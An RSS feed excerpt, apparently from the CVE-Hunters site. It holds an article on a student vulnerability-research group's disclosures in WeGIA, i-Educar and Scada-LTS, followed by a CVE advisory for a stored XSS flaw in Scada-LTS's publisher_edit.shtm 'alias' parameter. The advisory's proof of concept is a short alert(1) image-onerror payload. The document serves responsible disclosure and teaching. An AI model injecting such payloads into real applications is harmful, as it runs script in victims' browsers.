href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; constantly faced the same question:&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;amp;ldquo;How do I gain real-world experience in cybersecurity?&amp;amp;rdquo;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;the-problem-of-experience-in-cybersecurity&amp;#34;&amp;gt;The Problem of Experience in Cybersecurity
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The answer included two options: &amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Participating in CTFs:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;CTFs create a &amp;lt;i&amp;gt;&amp;#34;competition mindset&amp;#34;&amp;lt;/i&amp;gt; that&amp;#39;s different from the real world, focusing on solving artificial challenges that don&amp;#39;t simulate the complexity of production systems.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Studying for certifications:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Certifications, in turn, are costly and focus on theory without immediate practical application.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The job market perpetuates this paradox. Even &amp;lt;i&amp;gt;&amp;#34;junior&amp;#34;&amp;lt;/i&amp;gt; positions require prior experience, seeking professionals with experience in vulnerability assessment, practical knowledge of responsible disclosure, a demonstrable portfolio of security findings, and an understanding of business relevance.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;the-cve-hunters-philosophy&amp;#34;&amp;gt;The CVE-Hunters Philosophy
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Was born from the simple premise:&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;amp;ldquo;We got tired of waiting for opportunities, so we created our own.&amp;amp;rdquo;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The difference lies in the selection of Open-Source projects, based on &amp;lt;b&amp;gt;real social benefit&amp;lt;/b&amp;gt;, prioritizing projects used by organizations that serve vulnerable populations.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;1st-wave--wegia-project&amp;#34;&amp;gt;1st Wave – WeGIA Project
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In November 2024, with just three people (&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; and two students), they chose &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; as their first target. &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; is a Brazilian Open-Source platform used by social programs and NGOs, including orphanages, nursing homes, and adoption centers. The choice made sense: it had direct social relevance, accessible code, Brazilian developers facilitating communication, and it was a critical system protecting data from vulnerable populations.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The 1st Wave resulted in &amp;lt;b&amp;gt;48 published CVEs&amp;lt;/b&amp;gt; with an impressive distribution:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;34 Cross-Site Scripting (70.8%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;8 SQL Injection (16.7%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;2 Broken Access Control (4.2%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 Remote Code Execution (2.1%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 Open Redirect (2.1%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 Denial of Service (2.1%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 CSRF in sensitive action (2.1%).&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A special highlight was &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Elisangela Silva de Mendonça&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, a student who single-handedly discovered &amp;lt;b&amp;gt;29 of the 48 CVEs (60% of the total)&amp;lt;/b&amp;gt;. Her journey perfectly exemplifies the project&amp;#39;s potential: she started as a beginner in vulnerability research, developed a systematic analysis methodology, landed her first job in cybersecurity, and today serves as a reference point for new members within the group.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The impacts went beyond the number of CVEs published, creating ripples of &amp;lt;b&amp;gt;real change in the community&amp;lt;/b&amp;gt;. The first two students landed their first jobs in cybersecurity, validating in practice that the experience they gained was recognized by the market. Simultaneously, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; developers not only fixed the discovered vulnerabilities but also implemented &amp;lt;b&amp;gt;best security practices&amp;lt;/b&amp;gt; throughout the project. What began as a one-off collaboration evolved into a lasting relationship, with other independent researchers feeling inspired to contribute to the project.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;2nd-wave--portabilis-projects&amp;#34;&amp;gt;2nd Wave – Portabilis Projects
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This initial validation paved the way for an ambitious expansion. With 10 new students, the team identified its next challenge: &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://portabilis.com.br/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#Portabilis&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, a company that develops Open-Source software for educational management.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;i-Educar&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; represents an impressive story in terms of social reach:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;The system connects more than 80 Brazilian municipalities;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manages 2,050 schools;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Impacts 500,000 students.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;Even the Brazilian Air Force uses it for critical simulations.&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The discovery of &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-8789&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; illustrates how simple vulnerabilities can have devastating consequences.&amp;lt;/br&amp;gt;This flaw allowed &amp;lt;b&amp;gt;unprivileged users to change student grades&amp;lt;/b&amp;gt; through direct API calls. The irony was cruel: while the interface blocked unauthorized actions, the APIs operated as open doors, validating only whether the user was logged in, ignoring their specific permissions. The process revealed the systematic methodology developed: analysis of limited flows, request interception, bypass testing, and confirmation of true severity.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;The results of the 2nd Wave reflect scale and depth:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;42 vulnerabilities in &amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;i-Educar&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;19 in &amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/portabilis/i-diario&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;i-Diário&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;8 published CVEs;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;53 vulnerabilities in the disclosure process.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;3rd-wave--diversification-and-maturity&amp;#34;&amp;gt;3rd Wave – Diversification and Maturity
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The 3rd Wave marks remarkable maturity, managing &amp;lt;b&amp;gt;eight simultaneous projects&amp;lt;/b&amp;gt;, from continuity with &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; and &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;i-Educar&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; to diversification into &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/centreon/centreon&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Centreon&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/getgrav/grav&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Grav&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/indico/indico&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Indico&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, and &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/SCADA-LTS/Scada-LTS&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Scada-LTS&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;. Among all the discoveries, the work on &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/SCADA-LTS/Scada-LTS&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Scada-LTS&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; stands out as an almost cinematic moment. This system, used by the &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.itaipu.gov.br/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Itaipu Dam&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; to simulate cyberattacks on critical infrastructure, revealed two XSS vulnerabilities (&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-7728&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; and &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-7729&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;) in &amp;lt;b&amp;gt;less than a minute&amp;lt;/b&amp;gt;, demonstrating the refined efficiency of the methodology.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;structured-methodology&amp;#34;&amp;gt;Structured Methodology
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The process includes:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Careful selection (1-2 days) assessing social impact and maintainer responsiveness;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;In-depth reconnaissance (3-5 days) mapping architecture and configuring environments;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Intensive vulnerability assessment (15-20 days) combining static analysis with dynamic testing;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;PoC development (2-3 days);&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Responsible disclosure (5-10 days), involving careful diplomacy.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The toolkit evolved organically: SonarQube and Semgrep for static analysis, Burp Suite and OWASP ZAP for dynamic testing, and custom Python scripts for specific gaps. Reporting via VulnDB, GitHub Security Advisories, and standardized templates ensured consistency and increased acceptance rates.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Each Wave brought unique challenges. The technological diversity required specialized expertise in record time. The interpersonal challenges, uncooperative maintainers, variable response times, and different levels of security maturity taught strategic patience and stakeholder management. Two lessons emerged as fundamental:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Detailed documentation with screenshots and a clear articulation of business relevance;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Collaboration exponentially amplifies results through peer review and mentoring.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;educational-and-community-legacy&amp;#34;&amp;gt;Educational and Community Legacy
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The educational legacy developed impressive technical skills, systematic code analysis, intuitive understanding of attack surfaces, development of functional PoCs, and professional skills such as multiple project management, stakeholder relationships, and professional documentation. The results validated the original hypothesis: multiple members landed their first jobs with demonstrable portfolios and community recognition through public CVEs.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The contribution to the community extended beyond fixing vulnerabilities, establishing security practices in projects that previously ignored them, inspiring similar groups, and demonstrating the viability of collaborative models.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;the-future-of-cve-hunters&amp;#34;&amp;gt;The Future of CVE-Hunters
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The future includes:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Expansion through University partnerships;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;A formal mentoring program;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;The development of proprietary tools.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;For aspiring security researchers, the lessons are clear:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Initial focus on a single project with a measurable impact;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Sufficient time commitment, meticulous documentation;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Unwavering commitment to responsible disclosure.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Educators can revolutionize teaching by replacing simulations with engagement with real projects. The open source community can enhance results by establishing clear reporting channels and promoting a security-first culture.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;conclusion&amp;#34;&amp;gt;Conclusion
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; project has democratized access to real-world security expertise, creating a replicable path for &amp;lt;b&amp;gt;anyone&amp;lt;/b&amp;gt; who wants to make a difference.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The numbers:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;116 published CVEs;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;20 active members;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Millions of users impacted!&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Quantify success, but the qualitative effect is more significant:&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;You don&amp;amp;rsquo;t need to wait for opportunities when you can create your own.&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;#34;We weren&amp;#39;t just looking for bugs, we were looking for a way to contribute&amp;#34;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;And they have contributed profoundly to their own futures, to the security of systems that protect vulnerable populations, and to the next generation of security researchers armed with a tested roadmap to turn curiosity into a career.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Presentation &amp;#34;From Noobz to Vulnerability Researchers: The Journey of the CVE-Hunters&amp;#34; - DEF CON 33, 2025.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;presentation-author&amp;#34;&amp;gt;Presentation Author
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;article-written-by&amp;#34;&amp;gt;Article written by
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9137</title>
        <link>https://www.cvehunters.com/p/cve-2025-9137/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9137/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9137-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-alias&amp;#34;&amp;gt;CVE-2025-9137: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9137-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-alias&amp;#34;&amp;gt;CVE-2025-9137: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9137/image.png&amp;#34;
	width=&amp;#34;775&amp;#34;
	height=&amp;#34;485&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9137/image_hu_5233a8cd4b2f18d9.png 480w, /p/cve-2025-9137/image_hu_94453de285483063.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;159&amp;#34;
		data-flex-basis=&amp;#34;383px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
